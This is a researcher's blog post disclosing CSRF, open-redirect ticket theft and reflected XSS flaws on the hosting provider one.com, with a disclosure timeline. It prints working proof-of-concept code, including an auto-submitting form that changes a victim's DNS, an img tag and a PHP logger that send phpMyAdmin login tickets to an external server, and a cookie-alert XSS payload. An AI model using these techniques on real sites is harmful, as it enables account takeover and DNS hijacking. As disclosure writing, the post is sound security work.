About a year ago I found a few vulnerabilities on the one.com website. For those of you that don’t know, one.com is a fairly big and cheap hosting provider in Scandinavia. I reported the issues, but some have not been fixed yet. Since it’s been so long and one.com went silent in our communication, I’ve decided to disclose the following vulnerabilities.
They’re old and mostly don’t work any longer, but they might be interesting still.
At first, pretty much every function on the site for administrating your website was vulnerable to CSRF. I made a basic demo which changed the DNS settings of the user’s site which I sent to the staff.
Proof of concept code:
<script type="text/javascript" src="jquery-1.7.1.min.js"></script>
<form method="post" action="https://www.one.com/admin/dns-web-overview.do">
<input type="hidden" name="subDomain" value="www" />
<input type="hidden" name="type" value="WebAlias" />
<input type="hidden" name="value" value="<evil ip address>" />
<input type="hidden" name="advanced" value="true" />
<input type="submit" name="AddSetting" value="Add+DNS+settings" id="csrfgo" />
</form>
<script type="text/javascript">
$(document).ready(function () {
setTimeout(function () {
$("#csrfgo").click();
}, 2000);
});
</script>
This vulnerability was confirmed and was fixed pretty early.
Another vulnerabilty was in a redirect function which took the user from the
admin interface at one.com/admin/
to their phpmyadmin interface. As a nice user-friendly touch it bypasses the authentication by the means of a generated ticket which it sent attached to a custom
url in the phpMyAdmin application. By manipulating the url
I managed to send the authentication ticket to my own server instead. Using
CSRF I could then harvest a live ticket from a users session to gain access to their phpMyAdmin instance.
<img
src="https://www.one.com/admin/ticketredirect.do?url=http%3A%2F%2Fuddholm.com%2Fjoakim%2Fone%2Fticket.php&encode=UTF-8"
/>
The url it redirects to contained a basic php script to dump the ticket from url and display a nice picture to lull the user. This way the image tag still loaded too. Yay!
<?php
file_put_contents("tickets.txt", $_GET['ticket'] . "\n", FILE_APPEND);
$name = 'ohnoes.jpg';
$fp = fopen($name, 'rb');
header("Content-Type: image/jpg");
header("Content-Length: " . filesize($name));
// dump the picture and stop the script
fpassthru($fp);
?>
Using the ticket you could then gain access at the original redirect endpoint to the PHPMyAdmin site.
I also found some XSS in the premade blog and gallery websites which one.com provides for you. These are likely not enabled by the user though and the ones I found were reflected via POST. Here is an example exploit:
<script type="text/javascript" src="jquery-1.7.1.min.js"></script>
<form method="POST" action="http://iloapp.opol.com/blog/blog?ResetPassword">
<input
type="hidden"
name="email"
value=' "><body onload="alert(document.cookie)"></body>'
/>
<input type="hidden" name="x" value="48" />
<input type="hidden" name="y" value="15" />
<input type="submit" id="csrfgo" />
</form>
<script type="text/javascript">
$(document).ready(function () {
$("#csrfgo").click();
});
</script>
Contact attempt #1: 2013-03-21 CSRF.
One.com response: 2013-03-21 Confirmed issue.
PHPmyAdmin CSRF and minor xss: 2013-03-23
Contact attempt #2 after no fix: 2013-04-21
Queue nearly a year of no changes
The CSRF holes I found have been fixed or deprecated/removed in the new admin-interface. The minor XSS still remains to be fixed.